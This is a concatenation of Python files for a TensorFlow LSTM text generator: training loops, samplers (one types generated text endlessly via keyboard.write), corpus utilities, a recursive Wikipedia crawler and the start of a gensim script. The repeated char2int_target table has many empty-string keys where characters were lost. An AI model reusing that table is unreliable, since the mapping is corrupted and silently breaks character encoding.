'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
# Sampling-mode network (batch_size = num_steps = 1) sized to the vocab above,
# plus a saver to restore trained weights from a checkpoint.
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample a class id from the top_n most probable entries of preds.

    Everything outside the top_n probabilities is zeroed, the rest is
    renormalized, and one id is drawn from the resulting distribution.
    """
    probs = np.squeeze(preds)
    # zero out all but the top_n probabilities (mutates preds via the view)
    probs[np.argsort(probs)[:-top_n]] = 0
    probs = probs / np.sum(probs)
    return np.random.choice(vocab_size, 1, p=probs)[0]
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
    """Restore the model from `checkpoint` and type generated text forever.

    Primes the LSTM state with `prime`, then repeatedly samples the next
    character and emits it through keyboard.write(). Runs until the process
    is killed (the while loop never exits).
    NOTE(review): relies on the module-level `time` imported inside the
    __main__ guard — only safe when called after that import runs.
    """
    # samples = [c for c in prime]
    with train_chars.tf.Session() as sess:
        saver.restore(sess, checkpoint)
        new_state = sess.run(model.initial_state)
        # feed the prime text one character at a time to warm up the state
        for c in prime:
            x = np.zeros((1, 1))
            x[0,0] = char2int[c]
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
        # print("Preds:", preds)
        # first generated character after the prime
        c = pick_top_n(preds, vocab_size)
        char = int2char[c]
        keyboard.write(char)
        time.sleep(0.01)
        # samples.append(char)
        # generate and type characters indefinitely
        while True:
            x[0,0] = c
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
            c = pick_top_n(preds, vocab_size)
            char = int2char[c]
            keyboard.write(char)
            time.sleep(0.01)
            # samples.append(char)
            # return ''.join(samples)
if __name__ == "__main__":
    # checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
    # print(checkpoint)
    checkpoint = "checkpoints/i6291_l256.ckpt"
    print()
    f = open("generates/python.txt", "a", encoding="utf8")
    # invert the char->id table for decoding sampled ids
    int2char_target = { v:k for k, v in char2int_target.items() }
    import time
    # short delay so the user can focus the target window before typing starts
    time.sleep(2)
    write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU: hide all CUDA devices so TensorFlow falls back to the CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# session config pinning execution to a single CPU, no GPU
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
# Sampling-mode network (batch_size = num_steps = 1) sized to the vocab above,
# plus a saver to restore trained weights from a checkpoint.
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample a class id from the top_n most probable entries of preds.

    Everything outside the top_n probabilities is zeroed, the rest is
    renormalized, and one id is drawn from the resulting distribution.
    """
    probs = np.squeeze(preds)
    # zero out all but the top_n probabilities (mutates preds via the view)
    probs[np.argsort(probs)[:-top_n]] = 0
    probs = probs / np.sum(probs)
    return np.random.choice(vocab_size, 1, p=probs)[0]
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
    """Restore the model from `checkpoint` and return prime + n_samples chars.

    Primes the LSTM state with `prime`, then samples one character at a
    time from the top-5 predictions and joins the result into a string.
    """
    samples = [c for c in prime]
    with train_chars.tf.Session() as sess:
        saver.restore(sess, checkpoint)
        new_state = sess.run(model.initial_state)
        # feed the prime text one character at a time to warm up the state
        for c in prime:
            x = np.zeros((1, 1))
            x[0,0] = char2int[c]
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
        # print("Preds:", preds)
        c = pick_top_n(preds, vocab_size)
        samples.append(int2char[c])
        # generate n_samples characters, feeding each one back in
        for i in range(n_samples):
            x[0,0] = c
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
            c = pick_top_n(preds, vocab_size)
            char = int2char[c]
            samples.append(char)
            # if i == n_samples - 1 and char != " " and char != ".":
            # if i == n_samples - 1 and char != " ":
            #     # while char != "." and char != " ":
            #     while char != " ":
            #         x[0,0] = c
            #         feed = {model.inputs: x,
            #                 model.keep_prob: 1.,
            #                 model.initial_state: new_state}
            #         preds, new_state = sess.run([model.prediction, model.final_state],
            #                                     feed_dict=feed)
            #         c = pick_top_n(preds, vocab_size)
            #         char = int2char[c]
            #         samples.append(char)
    return ''.join(samples)
if __name__ == "__main__":
    # checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
    # print(checkpoint)
    checkpoint = "checkpoints/i6291_l256.ckpt"
    print()
    # generated samples are appended to this log file
    f = open("generates/python.txt", "a", encoding="utf8")
    # invert the char->id table for decoding sampled ids
    int2char_target = { v:k for k, v in char2int_target.items() }
    for prime in ["#"*100]:
        samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
        print(samp, file=f)
        print(samp)
        print("="*50)
        print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample a class id from the top_n most probable entries of preds.

    Everything outside the top_n probabilities is zeroed, the rest is
    renormalized, and one id is drawn from the resulting distribution.
    """
    probs = np.squeeze(preds)
    # zero out all but the top_n probabilities (mutates preds via the view)
    probs[np.argsort(probs)[:-top_n]] = 0
    probs = probs / np.sum(probs)
    return np.random.choice(vocab_size, 1, p=probs)[0]
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
    """Restore the word-level model and return prime + n_samples words.

    Words are joined with spaces.
    NOTE(review): `prime=["The"]` is a mutable default argument — safe only
    because it is never mutated here.
    """
    samples = [c for c in prime]
    # sampling-mode graph: batch_size = num_steps = 1
    model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
    saver = train_words.tf.train.Saver()
    with train_words.tf.Session() as sess:
        saver.restore(sess, checkpoint)
        new_state = sess.run(model.initial_state)
        # feed the prime words one at a time to warm up the state
        for c in prime:
            x = np.zeros((1, 1))
            x[0,0] = train_words.vocab_to_int[c]
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
        c = pick_top_n(preds, len(train_words.vocab))
        samples.append(train_words.int_to_vocab[c])
        # generate n_samples words, feeding each one back in
        for i in range(n_samples):
            x[0,0] = c
            feed = {model.inputs: x,
                    model.keep_prob: 1.,
                    model.initial_state: new_state}
            preds, new_state = sess.run([model.prediction, model.final_state],
                                        feed_dict=feed)
            c = pick_top_n(preds, len(train_words.vocab))
            char = train_words.int_to_vocab[c]
            samples.append(char)
    return ' '.join(samples)
if __name__ == "__main__":
    # checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
    # print(checkpoint)
    checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
    # sample 400 words from the trained word-level model
    samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
    print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
    '''Create a generator that returns batches of size
       batch_size x n_steps from arr.

       Arguments
       ---------
       arr: Array you want to make batches from
       batch_size: Batch size, the number of sequences per batch
       n_steps: Number of sequence steps per batch

       Yields (x, y) where y is x shifted one step left; the final target
       column is zero-filled when no next element exists.
    '''
    chars_per_batch = batch_size * n_steps
    n_batches = len(arr) // chars_per_batch
    # keep only full batches, one sequence per row
    arr = arr[:chars_per_batch * n_batches].reshape((batch_size, -1))
    for start in range(0, arr.shape[1], n_steps):
        x = arr[:, start:start + n_steps]
        shifted = arr[:, start + 1:start + n_steps + 1]
        y = np.zeros(x.shape, dtype=shifted.dtype)
        y[:, :shifted.shape[1]] = shifted
        yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
def build_inputs(batch_size, num_steps):
    ''' Define placeholders for inputs, targets, and dropout

        Arguments
        ---------
        batch_size: Batch size, number of sequences per batch
        num_steps: Number of sequence steps in a batch

        Returns (inputs, targets, keep_prob): int32 token-id placeholders of
        shape (batch_size, num_steps) plus a scalar float32 keep probability.
    '''
    token_shape = (batch_size, num_steps)
    inputs = tf.placeholder(tf.int32, shape=token_shape, name="inputs")
    targets = tf.placeholder(tf.int32, shape=token_shape, name="targets")
    keep_prob = tf.placeholder(tf.float32, name="keep_prob")
    return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
    ''' Build LSTM cell.

        Arguments
        ---------
        lstm_size: Size of the hidden layers in the LSTM cells
        num_layers: Number of LSTM layers
        batch_size: Batch size
        keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability

        Returns (cell, initial_state): a stacked multi-layer cell and its
        all-zeros starting state.
    '''
    def _dropout_lstm_layer():
        # one BasicLSTMCell with dropout applied to its outputs
        return tf.contrib.rnn.DropoutWrapper(
            tf.contrib.rnn.BasicLSTMCell(lstm_size),
            output_keep_prob=keep_prob)

    # stack num_layers independent layers into one deep cell
    cell = tf.contrib.rnn.MultiRNNCell([_dropout_lstm_layer() for _ in range(num_layers)])
    return cell, cell.zero_state(batch_size, tf.float32)
def build_output(lstm_output, in_size, out_size):
    ''' Build a softmax layer, return the softmax output and logits.

        Arguments
        ---------
        lstm_output: List of output tensors from the LSTM layer
        in_size: Size of the input tensor, for example, size of the LSTM cells
        out_size: Size of this softmax layer
    '''
    # flatten to one row per (sequence, step) pair with in_size columns
    flat = tf.reshape(tf.concat(lstm_output, axis=1), (-1, in_size))
    # softmax projection variables live in their own scope
    with tf.variable_scope('softmax'):
        softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
        softmax_b = tf.Variable(tf.zeros(out_size))
    # one logit row per step per sequence
    logits = tf.matmul(flat, softmax_w) + softmax_b
    # probabilities over the vocabulary for prediction
    out = tf.nn.softmax(logits, name="predictions")
    return out, logits
def build_loss(logits, targets, num_classes):
    ''' Calculate the loss from the logits and the targets.

        Arguments
        ---------
        logits: Logits from final fully connected layer
        targets: Targets for supervised learning
        num_classes: Number of classes in targets
    '''
    # one-hot encode targets and reshape to match the logits layout
    y_one_hot = tf.one_hot(targets, num_classes)
    y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
    # mean softmax cross-entropy over every step of every sequence
    return tf.reduce_mean(
        tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped))
def build_optimizer(loss, learning_rate, grad_clip):
    ''' Build optimizer for training, using gradient clipping.

        Arguments:
        loss: Network loss
        learning_rate: Learning rate for optimizer
        grad_clip: threshold for preventing gradient exploding
    '''
    # clip gradients by global norm to keep training stable
    tvars = tf.trainable_variables()
    clipped_grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
    return tf.train.AdamOptimizer(learning_rate).apply_gradients(zip(clipped_grads, tvars))
class CharRNN:
    """Character-level RNN graph: stacked LSTM + softmax over the vocabulary.

    Builds placeholders, the LSTM stack, the softmax output layer, the loss
    and a gradient-clipped Adam optimizer on a freshly reset default graph.
    With sampling=True the graph is sized for one character at a time.
    """
    def __init__(self, num_classes, batch_size=64, num_steps=50,
                       lstm_size=128, num_layers=2, learning_rate=0.001,
                       grad_clip=5, sampling=False):
        # When we're using this network for sampling later, we'll be passing in
        # one character at a time, so providing an option for that
        if sampling:
            batch_size, num_steps = 1, 1
        else:
            batch_size, num_steps = batch_size, num_steps
        tf.reset_default_graph()
        # Build the input placeholder tensors
        self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
        # Build the LSTM cell
        # (lstm_size, num_layers, batch_size, keep_prob)
        cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
        ### Run the data through the RNN layers
        # First, one-hot encode the input tokens
        x_one_hot = tf.one_hot(self.inputs, num_classes)
        # Run each sequence step through the RNN with tf.nn.dynamic_rnn
        outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
        self.final_state = state
        # Get softmax predictions and logits
        # (lstm_output, in_size, out_size)
        # There are lstm_size nodes in hidden layers, and the number
        # of the total characters as num_classes (i.e output layer)
        self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
        # Loss and optimizer (with gradient clipping)
        # (logits, targets, num_classes)
        self.loss = build_loss(self.logits, self.targets, num_classes)
        # (loss, learning_rate, grad_clip)
        self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
    # Train the char-level CharRNN on Python source files, resuming from a
    # previous checkpoint (epoch 13) and saving one checkpoint per epoch.
    CHECKPOINT = "checkpoints"
    if not os.path.isdir(CHECKPOINT):
        os.mkdir(CHECKPOINT)
    # char_level=True: tokens are single characters; load=False forces a
    # fresh cleaning pass instead of reading a pickled corpus
    vocab, int2char, char2int, text = get_text(char_level=True,
                                               files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
                                               load=False,
                                               lower=False,
                                               save_index=4)
    print(char2int)
    # encode the whole corpus as integer ids
    encoded = np.array([char2int[c] for c in text])
    print("[*] Total characters :", len(text))
    print("[*] Number of classes :", len(vocab))
    # hyperparameters (batch_size, num_steps, ...) come from parameters.py
    model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
                    lstm_size=lstm_size, num_layers=num_layers,
                    learning_rate=learning_rate)
    saver = tf.train.Saver(max_to_keep=100)
    with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
        sess.run(tf.global_variables_initializer())
        # Use the line below to load a checkpoint and resume training
        saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
        total_steps = len(encoded) // batch_size // num_steps
        # resume at epoch 14 to match the restored checkpoint
        for e in range(14, epochs):
            # Train network
            cs = 0
            # carry the LSTM state across batches within an epoch
            new_state = sess.run(model.initial_state)
            min_loss = np.inf
            batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
                                f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
                                total=total_steps)
            for x, y in batches:
                cs += 1
                start = perf_counter()
                feed = {model.inputs: x,
                        model.targets: y,
                        model.keep_prob: keep_prob,
                        model.initial_state: new_state}
                batch_loss, new_state, _ = sess.run([model.loss,
                                                     model.final_state,
                                                     model.optimizer],
                                                    feed_dict=feed)
                batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
            # checkpoint once per epoch
            saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
            print("Loss:", batch_loss)
        # final checkpoint after all epochs
        saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
# initialize colorama so ANSI color codes render on Windows terminals
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
# word-level training uses its own checkpoint directory
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
    os.mkdir(CHECKPOINT)
# default word-level tokenization (char_level=False) of the corpus in data/
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
# free the raw token list; only the encoded array is needed from here on
del text
if __name__ == "__main__":
    # Word-level CharRNN training with colored progress printing and an ETA
    # estimate based on the running average batch time.
    def calculate_time():
        # Updates the module-level timing accumulators after each batch.
        # Uses globals because it both reads and rebinds them.
        global time_took
        global start
        global total_time_took
        global times_took
        global avg_time_took
        global time_estimated
        global total_steps
        time_took = perf_counter() - start
        total_time_took += time_took
        times_took.append(time_took)
        avg_time_took = sum(times_took) / len(times_took)
        # remaining time = projected total minus time already spent
        time_estimated = total_steps * avg_time_took - total_time_took
    model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
                    lstm_size=lstm_size, num_layers=num_layers,
                    learning_rate=learning_rate)
    saver = tf.train.Saver(max_to_keep=100)
    with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
        sess.run(tf.global_variables_initializer())
        # Use the line below to load a checkpoint and resume training
        # saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
        # calculate total steps
        total_steps = epochs * len(encoded) / (batch_size * num_steps)
        time_estimated = "N/A"
        times_took = []
        total_time_took = 0
        current_steps = 0
        progress_percentage = 0
        for e in range(epochs):
            # Train network
            new_state = sess.run(model.initial_state)
            min_loss = np.inf
            for x, y in get_batches(encoded, batch_size, num_steps):
                current_steps += 1
                start = perf_counter()
                feed = {model.inputs: x,
                        model.targets: y,
                        model.keep_prob: keep_prob,
                        model.initial_state: new_state}
                batch_loss, new_state, _ = sess.run([model.loss,
                                                     model.final_state,
                                                     model.optimizer],
                                                    feed_dict=feed)
                progress_percentage = current_steps * 100 / total_steps
                # new best loss: print a persistent (green) progress line
                if batch_loss < min_loss:
                    # saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
                    min_loss = batch_loss
                    calculate_time()
                    print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
                    continue
                # periodic in-place progress line (carriage return, no newline)
                if (current_steps % print_every_n == 0):
                    calculate_time()
                    print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
                # periodic checkpoint
                if (current_steps % save_every_n == 0):
                    saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
        # final checkpoint after training completes
        saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
# inflect engine — presumably for spelling digits out as words
# ("7" -> "seven"); only referenced by commented-out code. TODO confirm.
p = inflect.engine()
# placeholder token for out-of-vocabulary words
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
    """Format a duration given in seconds as a human-readable string.

    Larger units (days/months/years, with 30-day months and 12-month years)
    are prepended only when non-zero, e.g. ``get_time(90061)`` ->
    ``"1d 01:01:01"``.

    :param seconds: duration in seconds; non-numeric values (e.g. the
        "N/A" placeholder used by the training scripts) are returned
        unchanged.
    :param form: base format string for the HH:MM:SS part.
    :return: formatted string, or *seconds* itself when not numeric.
    """
    try:
        seconds = int(seconds)
    except (TypeError, ValueError):
        # non-numeric input is passed through untouched (used for "N/A")
        return seconds
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    months, days = divmod(days, 30)
    years, months = divmod(months, 12)
    # Fix: the original used `elif years`, which silently dropped the years
    # component whenever months was non-zero. Each unit is now independent.
    if days:
        form = "{days}d " + form
    if months:
        form = "{months}m " + form
    if years:
        form = "{years}y " + form
    return form.format(**locals())
def get_text(path="data",
             files=["carroll-alice.txt", "text.txt", "text8.txt"],
             load=True,
             char_level=False,
             lower=True,
             save=True,
             save_index=1):
    """Load, clean and tokenize a text corpus.

    Returns ``(vocab, int2word, word2int, tokens)`` where *tokens* is a list
    of characters (char_level=True) or whitespace-split words. When *load*
    is True, previously pickled results in *path* are offered interactively
    instead of re-cleaning. When *save* is True the result is pickled to
    ``text_data_{save_index}.pickle``.

    NOTE(review): the default *files* list is a mutable default argument —
    harmless here since it is never mutated, but worth confirming.
    """
    if load:
        # check if any pre-cleaned saved data exists first
        pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
        if len(pickle_files) == 1:
            return pickle.load(open(pickle_files[0], "rb"))
        elif len(pickle_files) > 1:
            # several caches exist: ask the user which one to load
            sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
            s = ""
            for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
                s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
            choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
            if choice != 99:
                chosen_file = pickle_files[choice-1]
                print("[*] Loading pickled data...")
                return pickle.load(open(chosen_file, "rb"))
    # concatenate all corpus files into one string
    text = ""
    for file in tqdm.tqdm(files, "Loading data"):
        file = os.path.join(path, file)
        with open(file) as f:
            if lower:
                text += f.read().lower()
            else:
                text += f.read()
    print(len(text))
    punc = set(punctuation)
    # keep only characters present in the char2int_target mapping
    # text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
    text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
    # for ws in whitespace:
    #     text = text.replace(ws, " ")
    if char_level:
        text = list(text)
    else:
        text = text.split()
    # new_text = []
    # digit-to-word normalization below is disabled; tokens pass through as-is
    new_text = text
    # append = new_text.append
    # co = 0
    # if char_level:
    #     k = 0
    #     for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
    #         if not text[i].isdigit():
    #             append(text[i])
    #             k = 0
    #         else:
    #             # if this digit is mapped to a word already using
    #             # the below method, then just continue
    #             if k >= 1:
    #                 k -= 1
    #                 continue
    #             # if there are more digits following this character
    #             # k = 0
    #             digits = ""
    #             while text[i+k].isdigit():
    #                 digits += text[i+k]
    #                 k += 1
    #             w = p.number_to_words(digits).replace("-", " ").replace(",", "")
    #             for c in w:
    #                 append(c)
    #                 co += 1
    # else:
    #     for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
    #         # convert digits to words
    #         # (i.e '7' to 'seven')
    #         if text[i].isdigit():
    #             text[i] = p.number_to_words(text[i]).replace("-", " ")
    #             append(text[i])
    #             co += 1
    #         else:
    #             append(text[i])
    # vocabulary is the sorted set of unique tokens
    vocab = sorted(set(new_text))
    print(f"alices in vocab:", "alices" in vocab)
    # print(f"Converted {co} digits to words.")
    print(f"Total vocabulary size:", len(vocab))
    # id<->token lookup tables (ids start at 0)
    int2word = { i:w for i, w in enumerate(vocab) }
    word2int = { w:i for i, w in enumerate(vocab) }
    if save:
        pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
        print("Pickling data for future use to", pickle_filename)
        pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
    return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
    """Render a byte count as a human-readable size string.

    e.g. ``get_size(1536)`` -> ``"1.50KB"``. Falls through to exabytes
    for anything beyond petabytes.
    """
    step = 1024
    units = ['', 'K', 'M', 'G', 'T', 'P']
    for unit in units:
        if size < step:
            return f"{size:.2f}{unit}{suffix}"
        size /= step
    return f"{size:.2f}E{suffix}"
import wikipedia
from threading import Thread
def gather(page_name):
    """Download a Wikipedia page, write its content to data/<name>.txt and
    recursively crawl its first five links, one thread per link.

    Fix: the original computed *filename* but then wrote every page to the
    same hard-coded path, so each crawl overwrote the previous dump; the
    file handle was also never closed.
    """
    print(f"Crawling {page_name}")
    page = wikipedia.page(page_name)
    # sanitize the page title for use as a file name
    filename = page_name.replace(" ", "_")
    with open(f"data/{filename}.txt", 'w', encoding="utf-8") as f:
        print(page.content, file=f)
    print(f"Done crawling {page_name}")
    # fan out to the first five linked pages; threads daemonize nothing,
    # so the process waits for the whole (unbounded) crawl tree
    for i in range(5):
        Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
    # seed the recursive crawl with a single topic
    for seed_page in ["Relativity"]:
        gather(seed_page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
# Train a gensim Word2Vec model on a cleaned Arabic corpus:
# split into ayat, drop stop words, pad, then fit embeddings.
with open("data/quran_cleaned.txt", encoding="utf8") as f:
    text = f.read()
# print(text[:500])
